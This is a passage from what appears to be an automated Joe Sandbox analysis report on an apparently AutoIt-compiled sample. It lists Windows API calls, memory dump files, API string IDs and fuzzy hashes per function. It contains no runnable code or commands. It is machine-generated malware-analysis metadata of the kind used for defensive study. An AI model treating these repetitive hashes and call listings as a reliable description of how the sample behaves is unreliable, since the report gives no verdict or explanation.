                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A316FB
                                                                                                • Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31777
                                                                                              • __freea.LIBCMT ref: 00A317A2
                                                                                              • __freea.LIBCMT ref: 00A317AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 2829977744-0
                                                                                              • Opcode ID: a430f6bd045ec0c5d89d4b5194b2c5551f1eb46c5f32eca6836bdbc59a0a653e
                                                                                              • Instruction ID: 26558647009f570b0caf32021112cb912af0220103128ad5728d0e6323d7b85e
                                                                                              • Opcode Fuzzy Hash: a430f6bd045ec0c5d89d4b5194b2c5551f1eb46c5f32eca6836bdbc59a0a653e
                                                                                              • Instruction Fuzzy Hash: AD919272E002169FDF218FA4CD82AEEBBB5AF49710F184669F801E7241DB35DD41CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2610073882-625585964
                                                                                              • Opcode ID: 1b26a9a008bdf3bd7bc3f93a3816a5dcecefe902aec93577de4b9452aed7c6ba
                                                                                              • Instruction ID: 6b39c374f024b0bc7c99ffa79c4f6147c0cb57d5b494369b65de150a971ad9ed
                                                                                              • Opcode Fuzzy Hash: 1b26a9a008bdf3bd7bc3f93a3816a5dcecefe902aec93577de4b9452aed7c6ba
                                                                                              • Instruction Fuzzy Hash: 99916F71A00219ABDF24CFA4DC84FAEBBB8AF49714F10C559F519AB281D7709941CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00A6125C
                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61284
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00A612A8
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A612D8
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A6135F
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A613C4
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A61430
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                              • String ID:
                                                                                              • API String ID: 2550207440-0
                                                                                              • Opcode ID: 791f47b3dc6537d55c8ed888179935ca8e4fd571c8f69facb1ac5b92cc02b848
                                                                                              • Instruction ID: 14ea861c42b6fb734f5ed277f51474a0197d78054f090152d485e10c59063c33
                                                                                              • Opcode Fuzzy Hash: 791f47b3dc6537d55c8ed888179935ca8e4fd571c8f69facb1ac5b92cc02b848
                                                                                              • Instruction Fuzzy Hash: 6E9106B5A002099FDB00DFA8D899BFEBBB5FF45325F184029E511EB291DB74E941CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 1ea57b36f1edff3f5a2e006bc582ca2bbbd96227507b33e451fbdaa96adb0a02
                                                                                              • Instruction ID: b906845fcc2157d51a4d3a8a5fdbbe4d2e8f045a34d223d3259d994616175e93
                                                                                              • Opcode Fuzzy Hash: 1ea57b36f1edff3f5a2e006bc582ca2bbbd96227507b33e451fbdaa96adb0a02
                                                                                              • Instruction Fuzzy Hash: 4B912671D40219EFCB10CFA9DC84AEEBBB8FF89320F148555E515B7292D375AA42CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A7396B
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A73A7A
                                                                                              • _wcslen.LIBCMT ref: 00A73A8A
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A73C1F
                                                                                                • Part of subcall function 00A60CDF: VariantInit.OLEAUT32(00000000), ref: 00A60D1F
                                                                                                • Part of subcall function 00A60CDF: VariantCopy.OLEAUT32(?,?), ref: 00A60D28
                                                                                                • Part of subcall function 00A60CDF: VariantClear.OLEAUT32(?), ref: 00A60D34
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4137639002-1221869570
                                                                                              • Opcode ID: f02f06f7780c9119b5ac600ba4d63eddd31f148e9529785638f4c07aeed38245
                                                                                              • Instruction ID: 578867d5d4ae8c8324765eb22c4aac9d46a700ac40ef4aaae1118bb857824a06
                                                                                              • Opcode Fuzzy Hash: f02f06f7780c9119b5ac600ba4d63eddd31f148e9529785638f4c07aeed38245
                                                                                              • Instruction Fuzzy Hash: FC9177766083059FCB00EF24C98196AB7E4FF88314F04886DF98A9B351DB31EE45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A5000E: CLSIDFromProgID.OLE32 ref: 00A5002B
                                                                                                • Part of subcall function 00A5000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00A50046
                                                                                                • Part of subcall function 00A5000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A4FF41,80070057,?,?), ref: 00A50054
                                                                                                • Part of subcall function 00A5000E: CoTaskMemFree.OLE32(00000000), ref: 00A50064
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00A74C51
                                                                                              • _wcslen.LIBCMT ref: 00A74D59
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A74DCF
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00A74DDA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 614568839-2785691316
                                                                                              • Opcode ID: a9f7693c71f013f35b83e44466c30a738432206c234c452003e99c769cbf2524
                                                                                              • Instruction ID: 7348984fc10076c9f87d22ae2972fe654d46d6e94dbdd9162c0ab1edc3e67741
                                                                                              • Opcode Fuzzy Hash: a9f7693c71f013f35b83e44466c30a738432206c234c452003e99c769cbf2524
                                                                                              • Instruction Fuzzy Hash: CF912671D0021DAFDF14DFA4CC91AEEB7B8BF48310F10816AE919A7291EB709A45CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenu.USER32 ref: 00A82183
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00A821B5
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A821DD
                                                                                              • _wcslen.LIBCMT ref: 00A82213
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00A8224D
                                                                                              • GetSubMenu.USER32 ref: 00A8225B
                                                                                                • Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
                                                                                                • Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
                                                                                                • Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65
                                                                                              • PostMessageW.USER32 ref: 00A822E3
                                                                                                • Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 4196846111-0
                                                                                              • Opcode ID: be0b51cc07217ac765655c3eb3e4cbd5c0af1bdb4885663df68f2f1f021ae019
                                                                                              • Instruction ID: 6ed1cba6b83f0ff72be559f0f7e2e800fa178fe633d8f614d9c91675d6b82684
                                                                                              • Opcode Fuzzy Hash: be0b51cc07217ac765655c3eb3e4cbd5c0af1bdb4885663df68f2f1f021ae019
                                                                                              • Instruction Fuzzy Hash: 7E713E75A00215AFCB14EFA4C945BBEB7F5EF88320F148469E916EB351D734AD418F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 3a24f5911ffcf3602692ae5192ecf097eb3c256fd917d940695e32fee9774153
                                                                                              • Instruction ID: 45f2c76f5ac927f964dd306403748e95b518f5a1aa7ed06ddd8e67ed4232a414
                                                                                              • Opcode Fuzzy Hash: 3a24f5911ffcf3602692ae5192ecf097eb3c256fd917d940695e32fee9774153
                                                                                              • Instruction Fuzzy Hash: E051D3A06147D53DFB3683348C45BBABEA96B06306F088589F9D9558C2D3B8ACCCD761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 98527e03965eea216381ea70509b768108030ab60784816be4a2711380e526ec
                                                                                              • Instruction ID: 801176413513faaa1c0642ade038a0ac7a240e49295f26ea483650e08ab13c13
                                                                                              • Opcode Fuzzy Hash: 98527e03965eea216381ea70509b768108030ab60784816be4a2711380e526ec
                                                                                              • Instruction Fuzzy Hash: 6451E9A17047E53DFB3293348C46B7ABEA87B55302F088649E9D5568C2D3B4EC8CD762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32 ref: 00A25470
                                                                                              • __fassign.LIBCMT ref: 00A254EB
                                                                                              • __fassign.LIBCMT ref: 00A25506
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A33CD6,00000005,00000000,00000000), ref: 00A2552C
                                                                                              • WriteFile.KERNEL32(?,00A33CD6,00000000,00A25BA3,00000000), ref: 00A2554B
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00A25BA3,00000000), ref: 00A25584
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 565675f2bbb84b3233401c0d4fd91036c133aa371427d38be1a3e39ec1cba3df
                                                                                              • Instruction ID: 037ea074bc1ec6730d791a38237a36d43454205b606b818e1f6f36165cb34009
                                                                                              • Opcode Fuzzy Hash: 565675f2bbb84b3233401c0d4fd91036c133aa371427d38be1a3e39ec1cba3df
                                                                                              • Instruction Fuzzy Hash: 3351BE71E00619AFDB10CFACE885AEEBBF9FF09311F14452AF955E7291D6309A41CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A12D4B
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00A12D53
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A12DE1
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A12E0C
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A12E61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: f0aa70341f08a8c88c772667e2ccde7e1c8a6e11d15d96a2d6aed5ff77f2f09b
                                                                                              • Instruction ID: 1053b19bee6aa63e1c71091107b844a58c9b9004181ca6db38e876f537f3e0a2
                                                                                              • Opcode Fuzzy Hash: f0aa70341f08a8c88c772667e2ccde7e1c8a6e11d15d96a2d6aed5ff77f2f09b
                                                                                              • Instruction Fuzzy Hash: CF41AF34A00209AFCF10DF68D845BDEBBB5BF45324F148155E914AB392D731EAA6CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
                                                                                                • Part of subcall function 00A7304E: _wcslen.LIBCMT ref: 00A7309B
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A71112
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A71121
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A711C9
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A711F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2675159561-0
                                                                                              • Opcode ID: af0cabb1e9b911147d504cc80761a31e1ec08047ac753b8e782f2c0fa7ceaa6e
                                                                                              • Instruction ID: d1a002de673ab660703b3111ef05a07845603c3ae9a4f1b4b5b3a013997d74c1
                                                                                              • Opcode Fuzzy Hash: af0cabb1e9b911147d504cc80761a31e1ec08047ac753b8e782f2c0fa7ceaa6e
                                                                                              • Instruction Fuzzy Hash: 1641C331600208AFDB10DF58CC85BA9B7E9EF85324F54C159FA199F291D770AD42CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5CF22,?), ref: 00A5DDFD
                                                                                                • Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5CF22,?), ref: 00A5DE16
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A5CF45
                                                                                              • MoveFileW.KERNEL32 ref: 00A5CF7F
                                                                                              • _wcslen.LIBCMT ref: 00A5D005
                                                                                              • _wcslen.LIBCMT ref: 00A5D01B
                                                                                              • SHFileOperationW.SHELL32(?), ref: 00A5D061
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 3164238972-1173974218
                                                                                              • Opcode ID: 74194309192a96dd38236a2957c89594ff124d35639b9d7d4f79e81cae1e170b
                                                                                              • Instruction ID: 9bf37e021a46d824ef53f405723c36a2ad535509e605a0a90b8445d42353ed5f
                                                                                              • Opcode Fuzzy Hash: 74194309192a96dd38236a2957c89594ff124d35639b9d7d4f79e81cae1e170b
                                                                                              • Instruction Fuzzy Hash: EE4155719053185FDF12EBA4DE81ADEB7B8BF08391F0000E6E505EB142EA34AB8DCB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A82E1C
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A82E4F
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A82E84
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A82EB6
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A82EE0
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A82EF1
                                                                                              • SetWindowLongW.USER32 ref: 00A82F0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: bc2decc993d4b963307fd9d37028448f446111ba56a3e75812f145a3fa07dd1e
                                                                                              • Instruction ID: 1e7b0473dc228ad79aa87e369bdf0c98d95eab03dcb6f2ca335f6acb58fa82a5
                                                                                              • Opcode Fuzzy Hash: bc2decc993d4b963307fd9d37028448f446111ba56a3e75812f145a3fa07dd1e
                                                                                              • Instruction Fuzzy Hash: CA310130644250AFEB21EF98DC84FA53BE1FB9A720F1501A5FA018F2B2CB75AC41DB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A57769
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A5778F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A57792
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A577B0
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A577B9
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A577DE
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A577EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
